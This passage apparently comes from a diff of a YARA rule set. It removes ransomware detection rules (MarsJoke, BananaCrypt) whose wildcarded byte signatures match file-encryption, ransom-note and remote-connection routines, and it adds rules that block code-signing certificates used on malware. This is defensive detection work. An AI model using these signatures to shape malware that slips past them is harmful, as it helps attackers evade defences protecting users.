- 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 74 ?? 83 F8 ?? 75 ?? EB ?? 85 DB 0F 84 - ?? ?? ?? ?? C7 43 ?? ?? ?? ?? ?? 85 FF 75 ?? 33 C0 EB ?? 57 E8 ?? ?? ?? ?? 59 50 57 - 8D 4B ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 4E ?? E8 ?? ?? ?? ?? 33 C0 40 E8 ?? ?? ?? - ?? C2 ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? CC 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 - F6 89 75 ?? 33 FF 89 7D ?? 21 75 ?? 21 75 ?? 39 3D ?? ?? ?? ?? 75 ?? 8D 45 ?? 50 E8 - ?? ?? ?? ?? 8B F8 89 7D ?? 85 FF 74 ?? FF 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 8B F0 89 75 ?? C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? C2 - } - $drop_aux_files = { - A1 ?? ?? ?? ?? 89 01 A1 ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 41 ?? 66 A1 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 6A ?? 66 89 41 ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 74 ?? 56 6A ?? FF 15 ?? ?? - ?? ?? 89 85 ?? ?? ?? ?? 85 C0 74 ?? 56 6A ?? FF 15 ?? ?? ?? ?? 85 C0 74 ?? 50 FF 15 - ?? ?? ?? ?? 8B F8 85 FF 74 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B - F0 83 C4 ?? 85 F6 74 ?? 56 FF B5 ?? ?? ?? ?? 6A ?? 57 E8 ?? ?? ?? ?? 6A ?? 6A ?? 56 - E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF 15 - ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 68 - ?? ?? ?? ?? BA ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? - ?? ?? 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? - ?? ?? 56 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B F0 6A ?? 56 FF 15 ?? ?? - ?? ?? 50 89 85 ?? ?? ?? ?? E8 - } - $drop_ransom_notes = { - 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 - 75 ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 - ?? ?? ?? ?? 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 C0 ?? 89 85 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? 68 ?? - ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 C0 ?? 89 85 ?? ?? ?? ?? 68 ?? - ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 84 C0 75 ?? B9 ?? ?? ?? ?? 8D - 51 ?? 90 8A 01 41 84 C0 75 ?? 2B CA 51 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? - ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8B C8 85 C9 0F 84 ?? ?? ?? ?? 8B 01 8B 40 ?? FF D0 83 - C0 ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? - 84 C0 75 - } - condition: - uint16(0)==0x5A4D and ($find_files) and ($drop_aux_files) and ($drop_ransom_notes) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Baltservis LLC" and (pe.signatures[i].serial=="00:b6:3e:42:99:d0:b0:e2:dc:da:eb:97:61:67:a2:32:35" or pe.signatures[i].serial=="b6:3e:42:99:d0:b0:e2:dc:da:eb:97:61:67:a2:32:35") and 1604102400<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Marsjoke : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_1Dabae616705F5A51152Eac48423F354 : INFO FILE { meta: - description = "Yara rule that detects MarsJoke ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "8164c586-f548-5414-9df8-61e0c51cbe29" - date = "2020-07-15" - modified = "2020-07-15" + id = "8b050402-d5d3-5733-9a72-02386d850a04" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.MarsJoke.yara#L1-L157" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "298b2fd99793a15b3537853289e1337648d3fa84f12038e6f6831741404b7c5c" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14914-L14930" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "0bb14ececa3a78e1a2e71cfdee8bc57678251b15151d156ef5fa754b2438ee35" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "MarsJoke" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $search_and_encrypt_files = { - 55 8B EC 83 E4 ?? 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C4 89 84 24 ?? ?? ?? ?? 8B 45 - ?? 53 56 89 44 24 ?? 8B 45 ?? 57 89 44 24 ?? 8B 45 ?? BE ?? ?? ?? ?? 33 DB 56 89 44 - 24 ?? 8D 84 24 ?? ?? ?? ?? 8B F9 53 50 89 7C 24 ?? 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 83 C4 ?? 56 8D 84 24 ?? ?? ?? ?? 53 50 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 83 C4 ?? 8D 84 24 ?? ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 57 8D 4C 24 ?? 88 5C 24 ?? E8 ?? - ?? ?? ?? 83 C4 ?? 84 C0 0F 85 ?? ?? ?? ?? 38 5C 24 ?? 0F 85 ?? ?? ?? ?? 8D 84 24 ?? - ?? ?? ?? 57 50 E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 - 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 3D ?? ?? ?? ?? 59 59 BE ?? ?? ?? - ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 56 FF - 74 24 ?? FF D7 FF 74 24 ?? 8D 84 24 ?? ?? ?? ?? 50 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 - ?? 84 C0 8D 84 24 ?? ?? ?? ?? 75 ?? 50 FF 15 ?? ?? ?? ?? FF 74 24 ?? E9 ?? ?? ?? ?? - 6A ?? 50 FF D7 53 68 ?? ?? ?? ?? 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? - 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 ?? 56 8D 84 24 ?? ?? ?? ?? 50 FF D7 8D - 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 E9 ?? ?? ?? ?? 8D 4C - 24 ?? 51 50 FF 15 ?? ?? ?? ?? 53 68 ?? ?? ?? ?? FF 74 24 ?? FF 74 24 ?? E8 ?? ?? ?? - ?? 89 5C 24 ?? 33 DB 68 ?? ?? ?? ?? 89 44 24 ?? 8D 84 24 ?? ?? ?? ?? 53 50 89 54 24 - ?? 89 4C 24 ?? 66 89 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 74 24 ?? 8D 84 24 - ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 - 24 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 59 59 56 8D 84 24 ?? ?? ?? ?? 50 FF - D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 53 56 6A ?? 53 6A ?? 68 ?? ?? ?? ?? 8D - 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83 F8 ?? 89 44 24 ?? 75 ?? 56 8D 84 24 ?? ?? - ?? ?? 50 FF D7 8D 84 24 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? E9 ?? - ?? ?? ?? 6A ?? 59 33 C0 66 89 9C 24 ?? ?? ?? ?? 8D BC 24 ?? ?? ?? ?? F3 AB 6A ?? FF - 74 24 ?? 66 AB 8D 84 24 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 ?? 8D 8C 24 - ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? BF ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? - ?? 57 53 50 89 44 24 ?? E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 0B 44 24 ?? 74 ?? 83 44 - 24 ?? ?? 11 5C 24 ?? EB ?? 89 7C 24 ?? 89 5C 24 ?? BF ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? - 59 50 57 8B 7C 24 ?? 57 E8 ?? ?? ?? ?? 8B 44 24 ?? 83 C4 ?? 89 47 ?? 8B 44 24 ?? 53 - 89 47 ?? 8D 44 24 ?? 50 68 ?? ?? ?? ?? 57 FF 74 24 ?? C7 47 ?? ?? ?? ?? ?? 88 5C 24 - ?? FF 15 ?? ?? ?? ?? 85 C0 75 ?? C6 44 24 ?? ?? E9 ?? ?? ?? ?? 8B 7C 24 ?? 3B FB 89 - 5C 24 ?? 0F 8C ?? ?? ?? ?? 7F ?? 39 5C 24 ?? 0F 86 ?? ?? ?? ?? 8B 74 24 ?? 83 EE ?? - 1B FB 89 74 24 ?? 89 7C 24 ?? 89 5C 24 ?? 33 C0 EB ?? 8B 7C 24 ?? 8B 74 24 ?? 39 74 - 24 ?? 75 ?? 3B C7 75 ?? 8B 44 24 ?? 89 44 24 ?? EB ?? C7 44 24 ?? ?? ?? ?? ?? 68 ?? - ?? ?? ?? 53 FF 74 24 ?? E8 ?? ?? ?? ?? 83 C4 ?? 53 8D 44 24 ?? 50 FF 74 24 ?? FF 74 - 24 ?? FF 74 24 ?? FF 15 ?? ?? ?? ?? 6A ?? 58 39 44 24 ?? 73 ?? 89 44 24 ?? 39 74 24 - ?? 75 ?? 33 C0 3B C7 75 ?? 39 5C 24 ?? 7C ?? 7F ?? 83 7C 24 ?? ?? 76 ?? 8B 44 24 ?? - 83 E0 ?? 74 ?? 8B 4C 24 ?? 2B C8 03 C9 89 4C 24 ?? 6A ?? 68 ?? ?? ?? ?? FF 74 24 ?? - 53 FF 15 ?? ?? ?? ?? FF 74 24 ?? 89 44 24 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 44 24 - ?? 50 81 EC ?? ?? ?? ?? 6A ?? 59 8B FC FF B4 24 ?? ?? ?? ?? 8D B4 24 ?? ?? ?? ?? FF - B4 24 ?? ?? ?? ?? F3 A5 8B B4 24 ?? ?? ?? ?? 8B CE E8 ?? ?? ?? ?? 81 C4 ?? ?? ?? ?? - 53 8D 44 24 ?? 50 FF 74 24 ?? 56 FF 74 24 ?? FF 15 ?? ?? ?? ?? 85 C0 68 ?? ?? ?? ?? - 53 56 74 ?? FF 15 ?? ?? ?? ?? FF 44 24 ?? 8B 44 24 ?? 89 44 24 ?? 33 C0 3B 44 24 ?? - 0F 8C ?? ?? ?? ?? 7F ?? 8B 4C 24 ?? 3B 4C 24 ?? 0F 82 ?? ?? ?? ?? EB ?? C6 44 24 ?? - ?? FF 15 ?? ?? ?? ?? BE ?? ?? ?? ?? 68 ?? ?? ?? ?? 53 FF 74 24 ?? FF 15 ?? ?? ?? ?? - FF 74 24 ?? 8B 3D ?? ?? ?? ?? FF D7 FF 74 24 ?? FF D7 56 8D 84 24 ?? ?? ?? ?? 50 FF - 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8D 84 24 ?? ?? ?? ?? 50 FF D6 38 5C 24 ?? 8D 84 24 - ?? ?? ?? ?? 75 ?? 6A ?? FF 74 24 ?? 50 FF 15 ?? ?? ?? ?? 85 C0 FF 74 24 ?? 68 ?? ?? - ?? ?? 75 ?? E8 ?? ?? ?? ?? 59 59 8D 84 24 ?? ?? ?? ?? 50 FF D6 EB ?? E8 ?? ?? ?? ?? - 59 59 B0 ?? EB ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 32 C0 8B 8C 24 ?? ?? ?? ?? - 5F 5E 5B 33 CC E8 ?? ?? ?? ?? 8B E5 5D C3 - } - $remote_connection_2 = { - 55 8D 6C 24 ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? - 53 56 57 BE ?? ?? ?? ?? 56 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? C7 04 - 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B F8 56 89 BD ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 83 A5 ?? - ?? ?? ?? ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? - ?? BE ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? - ?? ?? 68 ?? ?? ?? ?? 57 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? - E8 ?? ?? ?? ?? 6A ?? 6A ?? 8B C3 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? - ?? 57 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A - ?? 8D 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? BE ?? ?? - ?? ?? 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? BF ?? ?? ?? ?? 57 - 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 50 8D 85 - ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? - 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? 57 8D 85 ?? ?? ?? ?? 6A ?? 50 E8 ?? - ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 - ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A - ?? 8D 5D ?? E8 ?? ?? ?? ?? 6A ?? 8D 5D ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 85 - ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B C3 - 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? - ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 - E8 ?? ?? ?? ?? 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 - FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? FF B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? E8 ?? - ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 59 59 5F 5E 5B 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 59 83 BD ?? ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 4D ?? 8B 85 ?? - ?? ?? ?? 33 CD E8 ?? ?? ?? ?? 83 C5 ?? C9 C3 - } - $remote_connection_1 = { - 55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 8D 85 - ?? ?? ?? ?? 50 8B F9 8B F2 68 ?? ?? ?? ?? 89 BD ?? ?? ?? ?? 89 B5 ?? ?? ?? ?? FF 15 - ?? ?? ?? ?? 33 DB 53 6A ?? 6A ?? FF 15 ?? ?? ?? ?? 6A ?? 89 85 ?? ?? ?? ?? 66 C7 85 - ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 6A ?? 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 - 88 1F 50 88 1E 66 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D - 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? 88 9D ?? ?? ?? ?? E8 ?? ?? ?? ?? 38 9D ?? ?? ?? - ?? 59 59 75 ?? 68 ?? ?? ?? ?? C6 07 ?? E8 ?? ?? ?? ?? 59 E9 ?? ?? ?? ?? 8D 85 ?? ?? - ?? ?? 50 E8 ?? ?? ?? ?? 89 9D ?? ?? ?? ?? 59 89 85 ?? ?? ?? ?? 33 F6 BB ?? ?? ?? ?? - 56 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 FF B5 - ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 75 ?? 56 53 E8 ?? ?? ?? ?? FF 85 ?? ?? ?? ?? - 46 83 FE ?? 59 59 7C ?? EB ?? 53 E8 ?? ?? ?? ?? 59 83 BD ?? ?? ?? ?? ?? 7C ?? C6 07 - ?? 53 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 F6 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 56 50 66 - 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? - 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF - B5 ?? ?? ?? ?? 53 E8 ?? ?? ?? ?? 59 59 56 FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 50 FF - B5 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 56 68 - ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF B5 ?? ?? ?? ?? C6 85 ?? ?? ?? ?? ?? FF 15 ?? ?? - ?? ?? 3B C6 0F 8E ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? - ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 89 B5 ?? ?? ?? ?? 0F 84 ?? - ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 56 E8 ?? ?? - ?? ?? 59 50 56 8D B5 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 59 8B C8 85 C9 - 89 8D ?? ?? ?? ?? 7D ?? C6 07 ?? 51 E9 ?? ?? ?? ?? 83 F9 ?? 0F 8C ?? ?? ?? ?? 83 BD - ?? ?? ?? ?? ?? 0F 85 ?? ?? ?? ?? 66 83 A5 ?? ?? ?? ?? ?? 33 C0 8D BD ?? ?? ?? ?? 66 - AB 40 3B C8 89 85 ?? ?? ?? ?? 0F 8E ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 68 ?? ?? ?? ?? FF - B5 ?? ?? ?? ?? 8D 47 ?? E8 ?? ?? ?? ?? 85 C0 59 59 0F 85 ?? ?? ?? ?? 8B 77 ?? 2B 37 - 8D 46 ?? 50 E8 ?? ?? ?? ?? 59 56 6A ?? 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 07 8B - 8D ?? ?? ?? ?? 83 C4 ?? 03 C8 51 8B 4F ?? 2B C8 51 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? - E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 8B 8D ?? ?? ?? ?? - E8 ?? ?? ?? ?? 59 50 89 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 59 40 50 E8 - ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? 8B F0 6A ?? 56 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 - C4 ?? FF B5 ?? ?? ?? ?? 8B C6 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 59 56 53 C6 04 06 ?? - E8 ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 A5 ?? ?? ?? ?? ?? 83 8D ?? ?? ?? ?? ?? 56 E8 - ?? ?? ?? ?? 83 C4 ?? 50 56 8D B5 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? E8 ?? ?? ?? ?? 33 F6 - 3B C6 59 59 0F 8C ?? ?? ?? ?? 83 F8 ?? 0F 8C ?? ?? ?? ?? 83 BD ?? ?? ?? ?? ?? 0F 85 - ?? ?? ?? ?? 83 F8 ?? 7E ?? 48 8D B5 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF - B5 ?? ?? ?? ?? 8D 46 ?? E8 ?? ?? ?? ?? 85 C0 59 59 75 ?? 8B 06 8B 8D ?? ?? ?? ?? 03 - C8 51 8B 4E ?? 2B C8 51 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? - 83 C6 ?? FF 8D ?? ?? ?? ?? 75 ?? 33 F6 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 - ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 39 B5 ?? - ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF 85 ?? ?? ?? ?? 8B 85 ?? ?? ?? - ?? 83 C7 ?? 3B 85 ?? ?? ?? ?? 0F 8C ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 - E8 ?? ?? ?? ?? 85 C0 59 59 0F 85 ?? ?? ?? ?? 39 85 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? - ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8D 85 ?? - ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 59 59 B0 ?? E9 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 50 53 C6 - 01 ?? E8 ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 59 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? - 59 39 B5 ?? ?? ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 39 B5 ?? ?? ?? ?? 74 - ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? 8B 85 ?? ?? ?? ?? 53 C6 00 ?? E8 ?? ?? ?? - ?? EB ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? C6 00 ?? EB ?? 0F - 84 ?? ?? ?? ?? C6 07 ?? FF 15 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 59 59 83 BD ?? ?? ?? - ?? ?? 74 ?? FF B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? - FF 15 ?? ?? ?? ?? 32 C0 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? C9 C3 - } - condition: - uint16(0)==0x5A4D and $search_and_encrypt_files and $remote_connection_1 and $remote_connection_2 + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "Xin Zhou" and pe.signatures[i].serial=="1d:ab:ae:61:67:05:f5:a5:11:52:ea:c4:84:23:f3:54" and 1470960000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Win32_Ransomware_Bananacrypt : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_50D08F3C9Bf86Fba52Cf592B4Fe6Eacf : INFO FILE { meta: - description = "Yara rule that detects BananaCrypt ransomware." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "9e47d094-d7fc-57dd-826c-5321d0219273" - date = "2020-09-14" - modified = "2020-09-14" + id = "f315cdda-4b95-534d-94db-9a04e2da6385" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/ransomware/Win32.Ransomware.BananaCrypt.yara#L1-L103" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "6bde4430e438947b0d7f10c4de11216929ec03af81b3d74f8b7bb8ed134d08d2" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L14932-L14948" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "ca613e4b45b9bb1ef7564b9fc6321bccc0f683298de692a3db2bf841db9010ef" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Ransomware" - tc_detection_name = "BananaCrypt" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $encrypt_files_p1 = { - 55 89 E5 57 56 53 89 C3 81 EC ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8B 55 ?? 89 8D ?? ?? ?? - ?? 85 D2 74 ?? 8B 45 ?? 85 C0 0F 85 ?? ?? ?? ?? 31 F6 0F B6 13 84 D2 0F 84 ?? ?? ?? - ?? 8D 43 ?? 88 95 ?? ?? ?? ?? 8D 8B ?? ?? ?? ?? 8D BD ?? ?? ?? ?? EB ?? 83 C0 ?? 83 - C7 ?? 88 57 ?? 39 C1 74 ?? 0F B6 10 84 D2 75 ?? 89 BD ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? - C6 00 ?? 89 1C 24 E8 ?? ?? ?? ?? 85 C0 89 85 ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 89 F0 84 - 